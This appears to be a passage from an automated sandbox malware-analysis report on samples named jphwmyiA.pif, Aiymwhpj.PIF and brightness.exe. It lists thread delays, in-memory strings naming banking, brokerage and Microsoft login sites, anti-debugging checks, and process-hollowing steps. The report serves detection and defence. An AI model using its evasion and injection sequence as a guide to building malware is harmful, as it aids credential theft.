                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595371Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595258Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595142Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594918Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594805Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594698Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594586Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594463Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594337Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594124Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 594003Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593708Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593261Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 593086Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592951Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592734Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592608Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592433Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592266Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592130Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 592016Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591890Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591751Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 591609Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifThread delayed: delay time: 600000
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: brightness.exe, 00000007.00000002.2129746891.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2129746891.00000000006AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: jphwmyiA.pif, 0000000A.00000002.3756955168.000000001F2D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^ W
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Aiymwhpj.PIF, 0000000C.00000002.2250088651.000000000083E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757186575.000000001A506000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3755893990.0000000020802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Aiymwhpj.PIF, 00000010.00000002.2330117639.00000000007C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: jphwmyiA.pif, 00000013.00000002.3761096680.0000000023B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Windows\SysWOW64\brightness.exeAPI call chain: ExitProcess graph end nodegraph_7-25744
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifAPI call chain: ExitProcess graph end nodegraph_10-85857
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFAPI call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifAPI call chain: ExitProcess graph end node
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027CF024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,7_2_027CF024
                  Source: C:\Windows\SysWOW64\brightness.exeProcess queried: DebugPort
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_25037A28 LdrInitializeThunk,10_2_25037A28
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C8798 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_027C8798
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040ADB0 GetProcessHeap,HeapFree,10_2_0040ADB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess token adjusted: Debug
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E61C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00416F6A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004123F1 SetUnhandledExceptionFilter,10_2_004123F1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040CE09
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0040E61C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00416F6A
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_004123F1 SetUnhandledExceptionFilter,15_2_004123F1
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\brightness.exeMemory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write
                  Source: C:\Windows\SysWOW64\brightness.exeSection unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFSection unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000
                  Source: C:\Windows\SysWOW64\brightness.exeMemory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 2BA008
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 321008
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFMemory written: C:\Users\Public\Libraries\jphwmyiA.pif base: 314008
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxs\!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\<
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\9
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\:
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\e
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0O,
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\c
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXD;!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8_;
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\n
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHbg!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\l
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDx.
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|H^!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\X
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPoG!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\V
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL'E!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 7i!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\[
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\#s
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\$U
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpLu
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,v`!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHB$!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\u
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX2W!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd4r
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\q
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd5T
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0>f!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\|
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\z
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8cv
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX$
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|ZB!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,Ks
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX+
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$=,
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,LU
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX(
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX&
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8KF!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 4R
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 3p
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDVX!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@tu
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP'7!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q 9)!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd<!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4\r
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX#4
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(De
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHRC!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4]T
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\+=
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXA
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|lB
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX>
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8ea
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXL
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxW(!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhD0
